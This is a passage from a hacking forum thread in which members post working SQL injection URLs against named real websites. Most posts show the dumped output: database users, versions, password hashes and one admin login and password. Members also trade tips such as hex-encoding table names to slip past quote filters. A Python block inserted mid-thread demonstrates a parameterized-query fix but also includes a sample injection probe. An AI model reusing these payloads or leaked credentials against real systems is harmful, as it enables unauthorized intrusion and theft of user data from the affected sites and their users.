SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. zifanchuck

    zifanchuck Elder

    Joined:
    27 Oct 2008
    Messages:
    396
    Likes Received:
    154
    Reputations:
    3
    only it's restricted to a certain IP there(
    login and pass: adminus:lPO7YBB0
     
    1 person likes this.
  2. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    user(): u_pogodatwo@localhost
    version(): 4.1.22
    database(): pogodatwo
     
  3. zifanchuck

    zifanchuck Elder

    Joined:
    27 Oct 2008
    Messages:
    396
    Likes Received:
    154
    Reputations:
    3
    got as far as this: test:test
    but I couldn't find the table with the admins(((
     
  4. flem

    flem Member

    Joined:
    17 May 2008
    Messages:
    4
    Likes Received:
    8
    Reputations:
    0
    zifanchuck, well, here's the admin panel pogoda.ua/admin, only test:test doesn't work!
     
  5. zifanchuck

    zifanchuck Elder

    Joined:
    27 Oct 2008
    Messages:
    396
    Likes Received:
    154
    Reputations:
    3
    I found the admin panel too, but I couldn't find out the admin's pass(((
     
  6. j0ker13

    j0ker13 Elder

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    http://www.emayhem.com/profiles/profile.php?profile=1'
    http://www.emayhem.com/profiles/profile.php?profile=-1+union+select+1,2,concat_ws(0x3a,user(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*&wId=4 => marty@localhost:5.0.37-log
    http://www.emayhem.com/profiles/profile.php?profile=-1+union+select+1,2,concat_ws(0x3a,email,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users+limit+0,1/*&wId=4 => [email protected]:ad452de6a1c6876e66abe0e853b6c0ad
    What the heck? It's version 5 but it outputs nothing from information_schema(( Who can help?)
     
  7. ..::TROYAN::..

    ..::TROYAN::.. Elder

    Joined:
    22 May 2008
    Messages:
    90
    Likes Received:
    116
    Reputations:
    14
    1.
    Code:
    http://www.flatlux.kiev.ua/rus/index.php?categoryID=-7+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6--
    flatlux_ower@saturn:flatlux_main:4.1.22-log
    PR:5
    TIC:160
    2.
    Code:
    http://www.membrana.kiev.ua/catalogue.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11--
    root@localhost:membrana:4.0.23a
    PR:0
    TIC: 10

    Code:
    http://www.membrana.kiev.ua/catalogue.php?id=-1+union+select+1,2,3,concat(user,0x3a,password,0x3a,file_priv),5,6,7,8,9,10,11+from+mysql.user--
    root:4fc7a3a65139e6ae:N
    3.
    Code:
    http://stroybat.kiev.ua/index.php?pid=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11--&showpage=1
    stroybat_stroy1@localhost:stroybat_stroybat:5.0.51a-community
    PR:3
    TIC: 30


    Code:
    http://stroybat.kiev.ua/index.php?pid=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11+from+information_schema.tables--&showpage=1
     
  8. Assembler

    Assembler Elder

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    Code:
    http://wow.cybergame.su/index.php?newsid=999999+union+select+1,version(),3,4,5,6%20--
    How can I see what came back with an injection like this? Nothing is visible on the screen, or I just don't see it -(
     
  9. zifanchuck

    zifanchuck Elder

    Joined:
    27 Oct 2008
    Messages:
    396
    Likes Received:
    154
    Reputations:
    3
    is there definitely an SQL injection there??? I'm not sure (I'm a newbie, to be fair)
    I think there isn't one
     
    1 person likes this.
  10. zifanchuck

    zifanchuck Elder

    Joined:
    27 Oct 2008
    Messages:
    396
    Likes Received:
    154
    Reputations:
    3
    So am I right after all?? It seems to me there's not a whiff of an injection there.
    But how it really is.... maybe there is an SQL injection there
     
  11. Merl00k

    Merl00k Member

    Joined:
    6 Nov 2008
    Messages:
    27
    Likes Received:
    10
    Reputations:
    0
    As far as I know, if the injection is blind, then there's no way
     
  12. sabe

    sabe Elder

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Aedes.com - PR 4 ~1k
    Northcoast101.com - PR 4 ~1k
    branch 4
    /admin

    Dsmi.tobw.net - PR 4 ~1k
    (

    Nlstar.com - PR 3 ~0.7k
    some other one..
     
    #7332 sabe, 8 Jan 2009
    Last edited: 8 Jan 2009
  13. zifanchuck

    zifanchuck Elder

    Joined:
    27 Oct 2008
    Messages:
    396
    Likes Received:
    154
    Reputations:
    3
    version 5.0.70-log

     
    #7333 zifanchuck, 8 Jan 2009
    Last edited: 8 Jan 2009
  14. Merl00k

    Merl00k Member

    Joined:
    6 Nov 2008
    Messages:
    27
    Likes Received:
    10
    Reputations:
    0
    Assembler

    there's no vulnerability there
     
  15. sharoff

    sharoff Member

    Joined:
    5 Aug 2007
    Messages:
    25
    Likes Received:
    6
    Reputations:
    0
    Code:
    http://wow.cybergame.su/index.php?newsid=-1+union+select+1,2,3,4,5,6+from+information_schema.tables--
    
    judging by the absence of an error when querying information_schema, the version there is 5, but I don't see any output...
     
  16. Merl00k

    Merl00k Member

    Joined:
    6 Nov 2008
    Messages:
    27
    Likes Received:
    10
    Reputations:
    0
    sharoff

    are you sure there's a bug there?
     
  17. R1dex

    R1dex Elder

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Code:
    http://wow.cybergame.su/index.php?newsid=-1+union+select+1,2,3,4,5--
    Returns: The used SELECT statements have a different number of columns

    Code:
    http://wow.cybergame.su/index.php?newsid=-1+union+select+1,2,3,4,5,6--
    The error disappeared.

    Result:

    6 columns, no output.

    PS: This thread is for posting injections; questions go in the neighboring one.
     
    1 person likes this.
  18. Assembler

    Assembler Elder

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    Code:
    http://wow.cybergame.su/index.php?newsid=-25+union+select+1,2,3,column_name,5,6+from+informa tion_schema.columns+where+table_name='account'--
    And again something's not right.
     
  19. sharoff

    sharoff Member

    Joined:
    5 Aug 2007
    Messages:
    25
    Likes Received:
    6
    Reputations:
    0
    Code:
    http://wow.cybergame.su/index.php?newsid=-25+union+select+1,2,3,column_name,5,6+from+information_schema.columns+where+table_name=0x6163636f756e74--
    Quotes are filtered there, so we use hex
    0x6163636f756e74 is the hex representation of account


    I repeat once more, there's no output there, you won't see any column_name.
     
    #7339 sharoff, 8 Jan 2009
    Last edited: 8 Jan 2009
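
Why the quote filter described in this exchange did not stop the injection, shown as an added defensive example (not code from the thread or from the site): the parameter sits in a numeric context, so only type validation plus a bound parameter closes it. The `news`/`account` schema, the function names and all rows are assumptions constructed for illustration, with sqlite3 standing in for MySQL.

```python
import re
import sqlite3


def make_db():
    """In-memory stand-in for the site's database (all rows constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news (id INTEGER, title TEXT, body TEXT,
                           author TEXT, created TEXT, views INTEGER);
        CREATE TABLE account (login TEXT, pass_hash TEXT);
        INSERT INTO news VALUES (1, 'Patch day', 'text', 'gm', '2009-01-08', 7);
        INSERT INTO account VALUES ('admin', 'CONSTRUCTED-HASH');
    """)
    return conn


def strip_quotes(value):
    """The weak control the thread describes: remove quote characters."""
    return value.replace("'", "").replace('"', "")


def get_news_filtered(conn, newsid):
    # Vulnerable: newsid lands in a numeric context, so an injected UNION
    # needs no quotes and the filter has nothing to remove.
    sql = "SELECT * FROM news WHERE id = " + strip_quotes(newsid)
    return conn.execute(sql).fetchall()


def get_news_bound(conn, newsid):
    # Hardened: accept only an integer, then bind it as a parameter so the
    # value can never change the statement's structure.
    if not re.fullmatch(r"-?\d{1,9}", newsid):
        raise ValueError("newsid must be an integer")
    sql = "SELECT * FROM news WHERE id = ?"
    return conn.execute(sql, (int(newsid),)).fetchall()


# Constructed input in the style of the requests quoted in the thread.
PROBE = "-1 union select 1,login,pass_hash,4,5,6 from account"

if __name__ == "__main__":
    db = make_db()
    print(get_news_filtered(db, PROBE))   # row from account leaks
    print(get_news_bound(db, "1"))        # normal lookup still works
    try:
        get_news_bound(db, PROBE)
    except ValueError as exc:
        print("rejected:", exc)
```
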
  20. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    Code:
    http://www.winlinanswers.com/book/resources.php?id=8'+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5   ,6,7,8,9,10,11/*
    user(): jeremym@localhost
    version(): 4.1.22
    database(): MOSKOWITZ
    PR: 6


    Code:
    http://www.admanager.nl/online/page.php?id=-8+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4--
    user(): [email protected]
    version(): 4.1.22
    database(): admanager
    PR: 5


    Code:
    http://www.fhmbuurmeisje.nl/profile.php?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat(user(),0x3a,ve   rsion(),0x3a,database())--
    user(): ttg-db@localhost
    version(): 4.1.20-log
    database(): ttg-fhm
    PR: 3


    Code:
    http://www.pca.org.au/?id=-8+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11,12--
    user(): [email protected]
    version(): 5.0.32-Debian_7etch6-log
    database(): pca_pca_org_au
    PR: 5

    found the table tblmemberlogin, it has a single field "txtPassword"

    there are only two hashes in the table:
    b334044a3535f437c14f24c1e76ae3fb
    5f4dcc3b5aa765d61d8327deb882cf99:password

    no login (didn't really look)
     